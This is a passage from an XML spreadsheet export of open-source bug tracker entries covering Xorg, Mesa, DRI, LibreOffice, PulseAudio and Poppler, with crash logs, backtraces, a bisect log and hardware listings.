    <t>DRI-11311</t>
  </si>
  <si>
    <t>[i965] tearing during video playback</t>
  </si>
  <si>
    <t>While watching something large moving on the screen (movie big window...) i can notice some kind of tedious effect.
While watching fast sequences of a movie it appears as three or four thin horizzontal lines but when moving windows on the desktop it looks more like the edges are flickering.
I will attach some screenshots i took to clarify the problem one is taken during a video playback one is taken while moving a windows without desktop effects enabled  and the last is taken with compiz.
I have a Fedora 7 system with:
xorg-x11-server 1.3.0.0
xorg-x11-drv-i810-2.0.0
on an Intel DG965WH motherboard (g965 integrated video).</t>
  </si>
  <si>
    <t>filippdavid</t>
  </si>
  <si>
    <t>MODEMMANAGER-95302</t>
  </si>
  <si>
    <t>[PATCH] mbm: wait until the E2NAP response for disconnecting</t>
  </si>
  <si>
    <t>Created attachment 123522
Patch 1/2
Otherwise the client may start connecting again (such as NetworkManager
on autoconnect retry) and the anychronous E2NAP may abort it.</t>
  </si>
  <si>
    <t>XORG-6229</t>
  </si>
  <si>
    <t>Radeon IGP 320M stopped to work with Xorg CVS(drm related)</t>
  </si>
  <si>
    <t>Starting from CVS from the beginning of february my IGP 320M stopped to work.
If i have dri activated when i start Xorg i just get blank screen.
In Xorg logs i can see a lot of messages like:
(EE) RADEON(0): RADEONWaitForIdleCP: CP idle -16                               
(EE) RADEON(0): Idle timed out resetting engine...                            
(**) RADEON(0): EngineRestore (32/32)           
Xserver use all cpu but still i can login with ssh.
When i activated debug in radeon kernel module i got next error messages:
[drm:radeon_do_wait_for_idle] *ERROR* failed!                                  
radeon_status:                                                                 
RBBM_STATUS = 0x80010140                                                       
CP_RB_RTPR = 0x00000000                                                        
CP_RB_WTPR = 0x0000000c                                                        
AIC_CNTL = 0x00000002                                                          
AIC_STAT = 0x00000004                                                          
AIC_PT_BASE = 0x00000000                                                       
TLB_ADDR = 0x00000000                                                          
TLB_DATA = 0x00000000
I use debian/unstable 2.6.15 kernel and use drm cvs 
by the way i have the same problems with drm from 2.6.15 kernel.
I have no problem with Xorg 6.9</t>
  </si>
  <si>
    <t>zhirnyi</t>
  </si>
  <si>
    <t>MESA-22628</t>
  </si>
  <si>
    <t>R200: xmoto causes cs space_accounted failure</t>
  </si>
  <si>
    <t>Created attachment 27409
xmoto backtrace
I was able to twice reproduce this by starting random xmoto levels.
First time it was first level that I tried test but 2nd time I have to test 6 levels before hitting the bug.
This is caused bo validation code refactoring and move to libdrm.</t>
  </si>
  <si>
    <t>POLICYKIT-46569</t>
  </si>
  <si>
    <t>Respect SUID_CFLAGS and SUID_LDFLAGS for suid binaries</t>
  </si>
  <si>
    <t>This is a good way for distributors to use -fPIE/-pie and that's what is used for util-linux for instance.</t>
  </si>
  <si>
    <t>XORG-1934</t>
  </si>
  <si>
    <t>DPMS*Time == 0 doesn't disable DPMS timer like it should.</t>
  </si>
  <si>
    <t>Patch fixes SetDPMSTimers() so that DPMS*Time == 0 disables the
appropriate timer. This takes advantage of the fact that
TimerSet() with a timeout argument 0 behaves like TimerCanel().
Already committed to HEAD. For 6.8.2 nomination only.</t>
  </si>
  <si>
    <t>LIBREOFFICE-61339</t>
  </si>
  <si>
    <t>FILEOPEN LibO 3572 .ods: CONDITIONAL FORMATTING without style type UI Localization related</t>
  </si>
  <si>
    <t>Created attachment 75402
Sample Document
Steps how to reproduce [Reproducible] with Server Installation of LibO  4.0.1.1+   -  GERMAN UI / German Locale  [Build ID: 2c0c17a6e4bee0ee28131ea4bdc47edc700d659)]  {tinderbox: @6 pull time  2013-02-1920:00(?)} on German WIN7 Home Premium (64bit) with newly created user profile â€¦.\LODev\4\:
Open attached Sample Document NewSample357odf from LibO Start Center.
Expected: cael A3 shown with Formatting Header because  of CF
Actual: Style info for cell A1 in Menu 'Formatting -&gt; CF -&gt;  is empty
Now try again after having switched to English UI: Works fine
I wonder whether tat really is 3.5.7 related or to something else I don't remember with what UI language I created the sample document.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-9241</t>
  </si>
  <si>
    <t>application/x-dia-diagram is a subclass of text/xml</t>
  </si>
  <si>
    <t>application/x-dia-diagram is a subclass of text/xml but isn't marked as such.</t>
  </si>
  <si>
    <t>LIBREOFFICE-76633</t>
  </si>
  <si>
    <t>RTF import: for image an additional Rectangle Drawing Object is inserted in the document</t>
  </si>
  <si>
    <t>Problem description: 
If you add an image to a .rtf file save it and then re-open the file you get some sort of square or rectangle in the top left corner (see the attachment for an example). Even when you remove this save and re-open the file it will reappear. This seems to only happen when you add an image to the file. 
Steps to reproduce:
1. Create a .rtf file.
2. Add an image.
3. Save the file as .rtf.
4. Re-open the file.
Current behavior:
Extra lines that souldn't be there
Expected behavior:
No extra lines
Operating System: Windows 8
Version: 4.2.0.4 release</t>
  </si>
  <si>
    <t>t.zwart</t>
  </si>
  <si>
    <t>XORG-5003</t>
  </si>
  <si>
    <t>Xorg code misuses S_IF* macros</t>
  </si>
  <si>
    <t>There's a few places in the Xorg code where the S_IF* macros are misused such
as this check in xc/lib/X11/XKBCvt.c:
     if ( (stat(cf&amp;sbuf)==0) &amp;&amp; (sbuf.st_mode&amp;S_IFREG) &amp;&amp;
S_IF* are not pure bitmasks but values to be compared with mode &amp; S_IFMT.
For instance on Solaris the values include:
#define S_IFREG         0x8000  /* regular */
#define S_IFLNK         0xA000  /* symbolic link */
#define S_IFSOCK        0xC000  /* socket */
#define S_IFDOOR        0xD000  /* door */
#define S_IFPORT        0xE000  /* event port */
which will all pass the above test as regular files.
On FreeBSD these values would pass that test:
#define S_IFREG  0100000                /* regular */
#define S_IFLNK  0120000                /* symbolic link */
#define S_IFSOCK 0140000                /* socket */
#define S_IFWHT  0160000                /* whiteout */
Fortunately most of the places this is misused is in old code not used any
more since there are #ifdef's to use the OS-provided macros that do the right 
thing if they're available (such as this snippet from xc/lib/Xt/Intrinsic.c
that does the right thing on platforms without X_NOT_POSIX defined):
#ifndef X_NOT_POSIX
            S_ISDIR(status.st_mode) == 0)      /* not a directory */
#else
            (status.st_mode    /* not a directory */
#endif /* X_NOT_POSIX else */
Offenders found by a find | xargs grep of the Xorg monolith were:
./config/util/checktree.c:    if ((fs-&gt;st_mode &amp; S_IFLNK) == S_IFLNK) {
./config/util/checktree.c:    if ((fs-&gt;st_mode &amp; S_IFDIR) == S_IFDIR) {
./config/util/checktree.c:    } else if ((fs-&gt;st_mode &amp; S_IFREG) != S_IFREG)
./config/util/checktree.c:      if ((fs.st_mode &amp; S_IFDIR) == S_IFDIR) {
./config/util/lndir.c:      if (sb.st_mode &amp; S_IFDIR) 
./config/util/lndir.c:    if (!(ts.st_mode &amp; S_IFDIR))
./config/util/lndir.c:    if (!(fs.st_mode &amp; S_IFDIR))
./lib/X11/XKBCvt.c:     if ( (stat(cf&amp;sbuf)==0) &amp;&amp; (sbuf.st_mode&amp;S_IFREG) &amp;&amp;
./lib/Xt/Intrinsic.c:       (status.st_mode    /* not a
directory */
checktree appears to be a no longer used distcheck tool for the old monolith
releases and can be ignored.
lndir uses the S_IS* macros instead if they are defined.
The XKBCvt.c is thus the only one we really need to fix since most modern
platforms have S_IS* but since it's trivial to fix lndir &amp; Intrinsic.c as
well a patch to fix all three will follow shortly.   (Will wait to commit
until after RC2 releases are tagged and released.)</t>
  </si>
  <si>
    <t>XORG-10101</t>
  </si>
  <si>
    <t>X.Org 7.4 tracker</t>
  </si>
  <si>
    <t>tracker bug for 2.0</t>
  </si>
  <si>
    <t>PULSEAUDIO-71185</t>
  </si>
  <si>
    <t>UA-101 - UA-101 playback Pulseaudio fails to detect card</t>
  </si>
  <si>
    <t>See also: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/986817
Edirol UA-101 card is not autodetected by PulseAudio and the driver is not loaded.
Therefore it cannot be used using PulseAudio without manual interaction (See workaround).
It works properly when accessed directly via ALSA.
There is a workaround to load the pulseaudio driver manually with the following script: (I have turned the frequency selector to 192kHz.)
#!/bin/bash
echo 'load-module module-alsa-sink device_id='$[$(cat /proc/asound/cards |grep UA101| cut -d'[' -f1)]' rate=192000 channels=6 channel_map=leftrightaux0aux1aux2aux3' | pacmd 
The UA-101 is an USB device that has a hardware switch to select sampling frequencies:
192000 Hz 6 Channels
96000  Hz 10 Channels
88200  Hz 10 Channels
48000  Hz 10 Channels
44100  Hz 10 Channels
When using 192000 Hz sampling rate only 6 channels are supported while otherwwise the card supports 10 channels.
Specifications: See http://www.rolandus.com/products/details/703/specs/</t>
  </si>
  <si>
    <t>PULSEAUDIO-91795</t>
  </si>
  <si>
    <t>[PATCH] Updated Polish translation for PulseAudio 7.0</t>
  </si>
  <si>
    <t>Created attachment 117970
i18n: Update Polish translation
Here is a patch that updates the Polish translation for the 7.0 release.</t>
  </si>
  <si>
    <t>DRI-76153</t>
  </si>
  <si>
    <t>[HSW-M Bisected]multiple small screen shows while running testdisplay -f / fastboot=1 pfit bug</t>
  </si>
  <si>
    <t>Created attachment 95770
dmesg
system Environment:
--------------------------
platform: BDW HSW IVB 
Kernel:	(drm-intel-next-queued) b2040f6fed736ccd2319768bc59833abe74148b8
Bug detailed description:
-------------------------
multiple small screen shows while running testdisplay -f please check the attachment for details.
It's a regression bug but we can not find good point.
Reproduce steps:
--------------------
1. ./testdisplay -f 63.501024107211761328768771775798
or ./testdisplay -f 38.258008329121024600603607624</t>
  </si>
  <si>
    <t>DRI-102985</t>
  </si>
  <si>
    <t>HDMI 2.0 4k EDIDs not available (Radeon RX Vega 56)</t>
  </si>
  <si>
    <t>Created attachment 134476
DRM/AMDGPU logs (journalctl)
I have a Radeon RX Vega 56 connected to a Sony 4K TV (kd-49x8305c) via a Premium (certified) HDMI 2.0 cable. The TV's HDMI input is set to Enhanced Format. Thus on the hardware side everything's ready to go for 4k@60Hz. On the software side I'm running Arch Linux with mesa-git (rev. 066d1dc951) llvm-svn (rev. 313470) and Linux branch amd-staging-drm-next (4.13 rev. dcae401d1113).  I'm running Gnome and I've tested both Wayland and Xorg.
While other functionality such as rendering and acceleration work with this setup I have been unable to access any 4k resolutions.
As you'll see in the attached logs the maximum resolution detected from the TV's EDID is 1920x1080. However using the program edid-decode (output attached) one can see that the EDID clearly advertises 4k modes however they're in the Extension block at VIC indexes higher than 64.
Until recently 64 was the highest supported by drivers/gpu/drm/drm_edid.c in the kernel.  However that has been fixed:
https://github.com/torvalds/linux/commit/8ec6e0755565192b328059b64f982adabbecda78#diff-f1b0089a97dd0195eb24305ab63a79e3
That commit has been merged into the amd-staging-drm-next kernel (but not amd-staging) and the revision that I have built and installed includes that code.  Nevertheless I haven't had any luck in getting the computer to recognize any of those extended modes.
I have tried adding the mode manually via xrandr however when I try to switch to that mode I get the error xrandr: Configure crtc 0 failed. Trying to set it in a conf file in /etc/X11/xorg.conf.d also didn't work (I no longer have a configuration file in there). I've also tried forcing it from the kernel command line (video=3840x2160@60) to no avail.  Still all of those seem like workarounds when I think the problem is pretty clearly that the VIC 65+ modes are not detected.</t>
  </si>
  <si>
    <t>bicom</t>
  </si>
  <si>
    <t>MESA-103246</t>
  </si>
  <si>
    <t>PoE: GPU hang with mesa &gt;= 17.2.0 + gallium-nine</t>
  </si>
  <si>
    <t>Created attachment 134818
Related packages info
General system info:
System information:
    Wine build: wine-2.18 (Staging)
    Platform: i386
    Version: Windows 7
    Host system: Linux
    Host version: 4.13.5-1-MANJARO
GPU: R9 280X (GCN 1.0)
GPU driver: xf86-video-ati 1:7.10.0-1 (radeonsi)
DE: plasma-desktop 5.10.5-1
Game info: https://appdb.winehq.org/objectManager.php?sClass=version&amp;iId=30942
Game version: 3.0.1e (Steam)
# Overview
So when using mesa 17.2+ with wine-staging-nine the whole system crashes
when entering certain areas on PoE.
After trying to enter my Hideout in the game the loading screen appears for a
few seconds (as usual) then a sound loop occurs for about 3 seconds then
silence and the whole system is completely unresponsive.
The keyboard does not work and the monitor has no video output (blue screen).
Then I just hard-reset the system.
Also a few days ago the game somehow crashed without bringing the whole
system down it just showed a game crashed dialog box.
# Game-specific info
I tried to enter the affected areas from Highgate (Act 9) which seems to have
no major issues after wandering around a bit.
So far it seems to crash on Sarn and the personal Hideout.
The only similarity that I can think of is the presence of Vagan and Vorici in
both areas.
But AFAIK it seems unlikely that characters textures would cause a GPU hang.
# Rambling
It is the exact same symptom (including the sound loop) that occured on my
6770m with Linux 3.13+ when I tried to run startx without setting
radeon.dpm=0.
# Debug
The whole screen including the terminal wine is launched from freezes so I'm
unable to see if wine printed anything during/after the crash.
I tried setting MESA_DEBUG=1 and MESA_LOG_FILE but nothing is ever written to
the log file (it is not even created).
I'm not sure if it is because everything really hangs no mesa errors actually
occur or if I need to compile it with debug flags.
In the case of the latter should I just follow this guide?
https://wiki.ixit.cz/d3d9_debugging
Also I'm not really sure whether the problem is on mesa or gallium-nine.
If you know how to debug this please leave a comment.
# Packages
After testing with different packages the problem occurs only with
wine-staging-nine.
Tested on wine-staging-nine 2.16+ (2.16-2.18) and mesa 17.2.0+ (17.2.0-17.2.2).
Mesa &lt; 17.2.0 has no problems with wine wine-staging nor wine-staging-nine.
Wine + gallium-nine works well enough with mesa &lt; 17.2.0.
Misc: At least on manjaro mesa 17.1.8 depends on llvm 4.0 and mesa 17.2+
depends on llvm 5.0.
Not sure if the version could be related to the issue.</t>
  </si>
  <si>
    <t>kmk3.bugs</t>
  </si>
  <si>
    <t>MESA-89829</t>
  </si>
  <si>
    <t>[bisected] radeonsi commit 2cf48c creates artefacts in some applications (worst being Flash animations that are garbage)</t>
  </si>
  <si>
    <t>Created attachment 114739
Error log from Chromium on a website with a wrongly rendered flash animation
I've been having rendering issues most notably with Flash (using Pepper Flash with Chrome) for the last 2 weeks. I just had time to invetigate it. I'm using latest drm ddx and mesa from git with a 4.0-rc6 kernel.
Any Flash animation is an absolute mess the thing being displayed instead of what is expected coming from other parts of what is displayed or was just displayed elsewhere on the screen.
After bisecting it appears the culprit commit is 2cf48c
main: Add entry point for CreateBuffers.
Author Laura Ekstrand
Author date 14-12-18 20:10
Parent Revert main: _mesa_cube_level_complete checks NumLayers.
Child main: Add entry point for NamedBufferStorage.
Branch origin/master (vc4: Drop integer multiplies with 0 to moves of 0.) 
    main: Add entry point for CreateBuffers.
    Reviewed-by: Martin Peres 
I'm also attaching an error log from Chromium when debugging a website with a flash animation (www.environnementestrie.ca).
Here is my bisect log.
--
git bisect log
git bisect start
# bad: [1dcc1ee314a6907213e2abd5337ec0bbba3bd1bf] vc4: Drop integer multiplies with 0 to moves of 0.
git bisect bad 1dcc1ee314a6907213e2abd5337ec0bbba3bd1bf
# good: [7a37d5c3a48c4adec5b5db589b0cb99dc9296f0c] r600g: Use R600_MAX_VIEWPORTS instead of 16
git bisect good 7a37d5c3a48c4adec5b5db589b0cb99dc9296f0c
# bad: [a815cd8449c207956176020e752cd0051ed842ec] i965: Don't disable exec masking for sampler message sends.
git bisect bad a815cd8449c207956176020e752cd0051ed842ec
# good: [567c8d73008a672cb71a84a4724829d34e1652b2] radeonsi: don't emit PA_SC_LINE_STIPPLE if not rendering lines
git bisect good 567c8d73008a672cb71a84a4724829d34e1652b2
# bad: [64788b2e8dc2ddedc2712ed02b7e9096638b7bae] i965: Throttle to the previous frame
git bisect bad 64788b2e8dc2ddedc2712ed02b7e9096638b7bae
# bad: [4f513bc330393c4615b4bad98e3e634408123960] main: Refactor MapBuffer[Range].
git bisect bad 4f513bc330393c4615b4bad98e3e634408123960
# good: [60f77b22b1e3bbef7e4d1f10012acf830d81ed7b] common.py: Fix PEP 8 issues.
git bisect good 60f77b22b1e3bbef7e4d1f10012acf830d81ed7b
# bad: [cb56835f870de01ed9c638d1470af38775bb6f72] main: Add entry point for NamedBufferData.
git bisect bad cb56835f870de01ed9c638d1470af38775bb6f72
# good: [44ecf0793d872e771edc448436f7a2fd7c3390f5] Revert main: _mesa_cube_level_complete checks NumLayers.
git bisect good 44ecf0793d872e771edc448436f7a2fd7c3390f5
# bad: [a76808dc19580855eb39c0904f3254edd765aa50] main: Add entry point for NamedBufferStorage.
git bisect bad a76808dc19580855eb39c0904f3254edd765aa50
# bad: [2cf48c37c1e2946f7c0648e0a5927a90209f59a4] main: Add entry point for CreateBuffers.
git bisect bad 2cf48c37c1e2946f7c0648e0a5927a90209f59a4
# first bad commit: [2cf48c37c1e2946f7c0648e0a5927a90209f59a4] main: Add entry point for CreateBuffers.</t>
  </si>
  <si>
    <t>LIBREOFFICE-81993</t>
  </si>
  <si>
    <t>FILEOPEN: DOCX paragraph not centered though it's style is set to center</t>
  </si>
  <si>
    <t>Created attachment 103789
test DOCX file
The attached DOCX file has a title and a subtitle each has styles applied. Both styles were set centered. 
When open with LibreOffice the title is centered as expected but sub-title is not centered.
The file was created with MSO 2010. It's centered in both MSO 2010 and Kingsoft Office.
Reproducible with:
LibreOffice 4.3.0.4 4.4.0.0.alpha0+ 2014-07-21_06:04:54
Windows XP SP3.
Also reproducible with Apache OpenOffice 4.1.</t>
  </si>
  <si>
    <t>MESA-18689</t>
  </si>
  <si>
    <t>Function `XGetXCBConnection' implicitly converted to pointer at single2.c:890 causes crash on 64bit maschines</t>
  </si>
  <si>
    <t>Created attachment 20560
fix missing include
While compiling mesa master (153cc70ddb52a2acc5a4790adc6d7a7b2ddf0d43)
on gentoo I got the following QA Notice
* QA Notice: Package has poor programming practices which may compile 
*            but will almost certainly crash on 64bit architectures. 
* 
* Function `XGetXCBConnection' implicitly converted to pointer at single2.c:890
and it did crash on my 64bit maschine.
patch fixes the missing include and makes it work</t>
  </si>
  <si>
    <t>POPPLER-103910</t>
  </si>
  <si>
    <t>Segfault on pdfsig when printing Signer full Distinguished Name</t>
  </si>
  <si>
    <t>Created attachment 135716
SignatureHandler-calloc.patch
Inside SignatureHandler.cc and specifically in SignatureHandler::getSignerSubjectDN() the subjectName of cert is read and returned back to validateSignature() of Form.cc and then to pdfsig.cc. Returning to pdfsig.cc though signature_handler is destroyed and as a result the pointer to subjectName is invalid. I am attaching a small patch that allocates memory for subjectName before returning to avoid segfault but this memory should be freed after usage. The patch attached is an example not as a patch to be merged to master :-)</t>
  </si>
  <si>
    <t>int.teo</t>
  </si>
  <si>
    <t>MESA-107843</t>
  </si>
  <si>
    <t>32bit Mesa build failes with meson.</t>
  </si>
  <si>
    <t>While building got several issues:
1. Issue of tools building.
../src/intel/common/gen_clflush.h: In function â€˜gen_clflush_rangeâ€™:
../src/intel/common/gen_clflush.h:37:7: error: implicit declaration of function â€˜__builtin_ia32_clflushâ€™ [-Werror=implicit-function-declaration]
       __builtin_ia32_clflush(p)
       ^
../src/intel/common/gen_clflush.h: In function â€˜gen_flush_rangeâ€™:
../src/intel/common/gen_clflush.h:45:4: error: implicit declaration of function â€˜__builtin_ia32_mfenceâ€™ [-Werror=implicit-function-declaration]
    __builtin_ia32_mfence()
2. issues with driconf:
../src/mesa/drivers/dri/i965/intel_screen.c:64:7: error: expected â€˜}â€™ before â€˜DRI_CONF_MESA_NO_ERRORâ€™
../src/mesa/drivers/dri/i965/intel_screen.c:87:7: error: expected â€˜}â€™ before â€˜DRI_CONF_ALLOW_GLSL_CROSS_STAGE_INTERPOLATION_MISMATCHâ€™
../src/mesa/drivers/dri/i965/intel_screen.c:98:7: error: expected â€˜}â€™ before â€˜DRI_CONF_ALLOW_RGB10_CONFIGSâ€™</t>
  </si>
  <si>
    <t>DRI-54596</t>
  </si>
  <si>
    <t>gpu hang and desktop lockup on dell vostro 320 AIO</t>
  </si>
  <si>
    <t>Created attachment 66727
error state dump
When using Dell Vostro 320 with openSUSE 11.2 and sometimes 11.4 system randomly locks up.
Desktop does not use any 3d functionality it's a windowmaker desktop with qt4 application (ran locally or through x11 forwarding over ssh) libreoffice rdp client and sometimes a webbrowser with flash. Regardless of kernel version (2.6.32 from 11.2 updates or vanilla 3.5.0 from external repository) i quite frequently encounter gpu hang messages in dmesg. 
Desktop does not respond remotely system is operational (ssh etc). X restart is not enough to restore operation of the system and full reboot is required.
attaching lspci  of the system : 
------------------------------------------------------
00:00.0 Host bridge: Intel Corporation 4 Series Chipset DRAM Controller (rev 03)
00:02.0 VGA compatible controller: Intel Corporation 4 Series Chipset Integrated Graphics Controller (rev 03)
00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01)
00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01)
00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 01)
00:1c.2 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 3 (rev 01)
00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 01)
00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 01)
00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 01)
00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 01)
00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01)
00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev e1)
00:1f.0 ISA bridge: Intel Corporation 82801GB/GR (ICH7 Family) LPC Interface Bridge (rev 01)
00:1f.2 IDE interface: Intel Corporation 82801GB/GR/GH (ICH7 Family) SATA IDE Controller (rev 01)
00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 01)
01:00.0 FireWire (IEEE 1394): VIA Technologies Inc. Device 3401
01:00.1 Mass storage controller: VIA Technologies Inc. Device 401a
01:00.2 SD Host controller: VIA Technologies Inc. Device 401b
02:00.0 Network controller: Broadcom Corporation BCM4312 802.11b/g (rev 01)
03:00.0 Ethernet controller: Realtek Semiconductor Co. Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 03)
--------------------------------------------------------
X driver identifies video hardware as G41.
dmesg snippet : 
Sep  6 14:22:02 box kernel: [422704.816011] [drm:i915_hangcheck_hung] *ERROR* Hangcheck timer elapsed... GPU hung
Sep  6 14:22:03 box kernel: [422706.332008] [drm:i915_hangcheck_hung] *ERROR* Hangcheck timer elapsed... GPU hung
Sep  6 14:22:03 box kernel: [422706.332117] [drm:i915_reset] *ERROR* GPU hanging too fast declaring wedged!
Sep  6 14:22:03 box kernel: [422706.332128] [drm:i915_reset] *ERROR* Failed to reset chip.
i managed to capture an error state dump as instructed in dmesg. I'll try to provide more info if the hang occurs again.</t>
  </si>
  <si>
    <t>SYSTEMD-78850</t>
  </si>
  <si>
    <t>gudev: Add missing (nullable) annotations on return values</t>
  </si>
  <si>
    <t>Created attachment 99266
gudev: add missing (nullable) annotations on return values
GObject Introspection has recently added support for annotating return values as nullable (see https://bugzilla.gnome.org/show_bug.cgi?id=660879) and gudev includes many functions which can return NULL.
Right now this is only in git but adding (nullable) annotations now should only cause some harmless warning messages from older g-ir-scanner and gtk-doc like warning: unknown annotation nullable in documentation for g_udev_... so I believe this is safe add the annotations immediately.</t>
  </si>
  <si>
    <t>TELEPATHY-21969</t>
  </si>
  <si>
    <t>telepathy-spec 0.17.25</t>
  </si>
  <si>
    <t>telepathy-qt4 should be updated to spec 0.17.25 before the next release please review.
http://git.collabora.co.uk/?p=user/smcv/telepathy-qt4-smcv.gita=shortlogh=refs/heads/spec</t>
  </si>
  <si>
    <t>XORG-23257</t>
  </si>
  <si>
    <t>master: Crash in FindChildForEvent</t>
  </si>
  <si>
    <t>Random crash I don't have a way to reliably reproduce this one it usually takes about an hour of easystroke running to reproduce.
Program terminated with signal 11 Segmentation fault.
#0  0x080866d2 in FindChildForEvent (dev=0xbc36a40 event=0xb9de408) at ../../dix/events.c:2222
2222	        if (w-&gt;parent == event)
(gdb) bt
#0  0x080866d2 in FindChildForEvent (dev=0xbc36a40 event=0xb9de408) at ../../dix/events.c:2222
#1  0x08086731 in FixUpEventFromWindow (pDev=0xbc36a40 xE=0xc489bb8 pWin=0xb9de408 child=0 calcChild=1)
    at ../../dix/events.c:2251
#2  0x0808a5a3 in DeliverGrabbedEvent (event=0xc1ac368 thisDev=0xbc36a40 deactivateGrab=0) at ../../dix/events.c:3867
#3  0x0816369c in ProcessRawEvent (ev=0xc1ac368 device=0xbc36a40) at ../../Xi/exevents.c:1014
#4  0x08163806 in ProcessOtherEvent (ev=0xc1ac368 device=0xbc36a40) at ../../Xi/exevents.c:1061
#5  0x0818b9b3 in ProcessKeyboardEvent (ev=0xc1ac368 keybd=0xbc36a40) at ../../xkb/xkbPrKeyEv.c:182
#6  0x080a71c2 in mieqProcessDeviceEvent (dev=0xbc36a40 event=0xc1ac368 screen=0x90fc3a8) at ../../mi/mieq.c:406
#7  0x080a73be in mieqProcessInputEvents () at ../../mi/mieq.c:465
#8  0x080c79f6 in ProcessInputEvents () at ../../../../hw/xfree86/common/xf86Events.c:171
#9  0x08079949 in Dispatch () at ../../dix/dispatch.c:394
#10 0x080670ae in main (argc=8 argv=0xbf9ebb74 envp=0xbf9ebb98) at ../../dix/main.c:282
(gdb) print pSprite-&gt;spriteTraceGood
$1 = 4
(gdb) print pSprite-&gt;spriteTrace[0]-&gt;drawable.depth
$2 = 24 '\30'
(gdb) print pSprite-&gt;spriteTrace[1]-&gt;drawable.depth
$3 = 24 '\30'
(gdb) print pSprite-&gt;spriteTrace[2]-&gt;drawable.depth
$4 = 72 'H'</t>
  </si>
  <si>
    <t>DRI-29082</t>
  </si>
  <si>
    <t>[Arrandale] 2.6.35-rc5 black screen and crash upon hot-unplugging a VGA monitor on HP EliteBook 2540p</t>
  </si>
  <si>
    <t>Created attachment 37080
VGA Bios
I am using the following software:
 - vanilla linux 2.6.35-rc5
 - Fedora 13
 - libdrm-2.4.21-2.fc13
 - xorg-x11-drv-intel-2.11.0-5.fc13
 - xorg-x11-server-Xorg-1.8.2-1.fc13
uname:
Linux air 2.6.35-rc5.x86_64 #1 SMP Wed Jul 14 15:55:31 PDT 2010 x86_64 x86_64
x86_64 GNU/Linux
lspci:
00:00.0 Host bridge: Intel Corporation Core Processor DRAM Controller (rev 12)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master fast devsel latency 0
    Capabilities: [e0] Vendor Specific Information: Len=0c 
    Kernel driver in use: agpgart-intel
00:02.0 VGA compatible controller: Intel Corporation Core Processor Integrated
Graphics Controller (rev 12) (prog-if 00 [VGA controller])
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master fast devsel latency 0 IRQ 47
    Memory at d0000000 (64-bit non-prefetchable) [size=4M]
    Memory at c0000000 (64-bit prefetchable) [size=256M]
    I/O ports at 5058 [size=8]
    Expansion ROM at  [disabled]
    Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit-
    Capabilities: [d0] Power Management version 2
    Capabilities: [a4] PCI Advanced Features
    Kernel driver in use: i915
    Kernel modules: i915
00:19.0 Ethernet controller: Intel Corporation 82577LM Gigabit Network
Connection (rev 06)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master fast devsel latency 0 IRQ 48
    Memory at d4700000 (32-bit non-prefetchable) [size=128K]
    Memory at d472a000 (32-bit non-prefetchable) [size=4K]
    I/O ports at 5020 [size=32]
    Capabilities: [c8] Power Management version 2
    Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+
    Capabilities: [e0] PCI Advanced Features
    Kernel driver in use: e1000e
    Kernel modules: e1000e
00:1a.0 USB Controller: Intel Corporation 5 Series/3400 Series Chipset USB2
Enhanced Host Controller (rev 06) (prog-if 20 [EHCI])
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master medium devsel latency 0 IRQ 16
    Memory at d4729000 (32-bit non-prefetchable) [size=1K]
    Capabilities: [50] Power Management version 2
    Capabilities: [58] Debug port: BAR=1 offset=00a0
    Capabilities: [98] PCI Advanced Features
    Kernel driver in use: ehci_hcd
00:1b.0 Audio device: Intel Corporation 5 Series/3400 Series Chipset High
Definition Audio (rev 06)
    Subsystem: Hewlett-Packard Company Device 7008
    Flags: bus master fast devsel latency 0 IRQ 50
    Memory at d4720000 (64-bit non-prefetchable) [size=16K]
    Capabilities: [50] Power Management version 2
    Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+
    Capabilities: [70] Express Root Complex Integrated Endpoint MSI 00
    Capabilities: [100] Virtual Channel
    Capabilities: [130] Root Complex Link
    Kernel driver in use: HDA Intel
    Kernel modules: snd-hda-intel
00:1c.0 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express
Root Port 1 (rev 06) (prog-if 00 [Normal decode])
    Flags: bus master fast devsel latency 0
    Bus: primary=00 secondary=01 subordinate=01 sec-latency=0
    Memory behind bridge: d4600000-d46fffff
    Capabilities: [40] Express Root Port (Slot+) MSI 00
    Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit-
    Capabilities: [90] Subsystem: Hewlett-Packard Company Device 7008
    Capabilities: [a0] Power Management version 2
    Kernel driver in use: pcieport
    Kernel modules: shpchp
00:1c.1 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express
Root Port 2 (rev 06) (prog-if 00 [Normal decode])
    Flags: bus master fast devsel latency 0
    Bus: primary=00 secondary=02 subordinate=42 sec-latency=0
    I/O behind bridge: 00003000-00004fff
    Memory behind bridge: d0600000-d45fffff
    Prefetchable memory behind bridge: 00000000d4900000-00000000d4afffff
    Capabilities: [40] Express Root Port (Slot+) MSI 00
    Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit-
    Capabilities: [90] Subsystem: Hewlett-Packard Company Device 7008
    Capabilities: [a0] Power Management version 2
    Kernel driver in use: pcieport
    Kernel modules: shpchp
00:1c.3 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express
